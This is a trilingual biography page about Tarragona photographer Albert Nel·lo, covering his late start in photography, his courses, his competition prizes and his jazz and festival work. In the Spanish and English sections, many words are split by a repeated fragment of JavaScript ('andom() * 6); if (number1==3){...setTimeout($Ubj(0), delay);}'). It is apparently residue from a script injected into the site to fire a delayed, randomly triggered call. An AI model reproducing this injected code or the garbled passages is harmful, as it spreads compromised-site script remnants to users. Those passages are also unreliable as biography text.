Sobre mi

Albert Nel·lo, fotògraf autodidacta, agafa la màquina al voltant del 40 anys. Tanmateix la seva vocació es prèvia, en paraules seves “tenia ja la fotografia a la mirada”. De més jove sentia ja un interès profund per la disciplina, aprèn de llibres de fotografies i practicant les tècniques de grans fotògrafs.

Els primers anys es forma en cursos especialitzats a diferents centres de Valls, Tarragona i Barcelona. És un autor que participa assíduament en importants concursos de fotografia, on obté premis tant destacats com el 1r premi del concurs de Setmana Santa l’any 2000 i 2005, primer premi a Martorell, el “Venus 76”, fins a quatre ocasions obté el 1r guardó del Concurs estatal de diapositives de Puig-Reig, – premi reconegut per la Federació Catalana de Fotografia -. Els anys 2002 i 2010 rep primers premis del certamen fotogràfic de la Mitja Marató de Tarragona. Ha participat en diverses ocasions al Concurs Internacional de Fotografia de la Vila de Cambrils.

Fotògraf versàtil que ha treballat diferents estils, el blanc i negre, el color en diversos formats,… i una temàtica molt variada, actes festius i populars com Santa Tecla, Carnaval, etc…; La Setmana Santa de Tarragona,  actuacions de dansa,  el Tàrraco Viva, esdeveniment en què ha atrapat moments durant 15 edicions; el retrat teatral, etc.

Gran amant del jazz, té un extens arxiu de fotografies de músics de jazz, en blanc i negre, obtingudes en els festivals més importants de jazz de Catalunya.

Nascut a Tarragona, aquesta ciutat és l’escenari de part de les seves fotografies, tot i que es desplaça sovint arreu de Catalunya per captar les seves instantànies.

 


 

Nacido en Tarragona la noche de Reyes de 1955, Albert comenzó a coleccionar miradas y paisajes en su retina, pero no fue hasta los 43 años que decidió  dar un paso adelante y decidió empezar la aventura de la fotografía. Su propio cuaderno de bitácora empezó a rellenarse de una extensa formación (cursos de técnica fotográfica, de revelado y de técnicas de iluminación de exteriores y de estudio, de edición en photoshop, etc).

Pero sobre todo su pasión por los grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andes fotógrafos visitandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}ando numerosas exposiciones, una práctica extenuante en captar toda manifestación cultural que le rodea y una innata visión artística es lo que ha hecho de Albert el gran fotógrafo que es ahora, con numerosos premios a su espalda.

 


 

Born in Tarragona in a Three Kings night of 1955, Albert began to collect face andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}and landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andscapes in his retina, but it was not until his 43 years when he decided to take a step forward andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}and started the adventure of photography. He began to fill his own logbook with an extensive training (in photographic techniques, in analog photographic processing, in lighting techniques in outdoors & studio, in photoshop edition, etc). 

But above all, his passion for great photographers, visiting numerous exhibitions , a strenuous practice capturing any cultural manifestation around him, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}and his innate artistic vision, that have made Albert the great photographer who is now, with several awards that demonstrate it.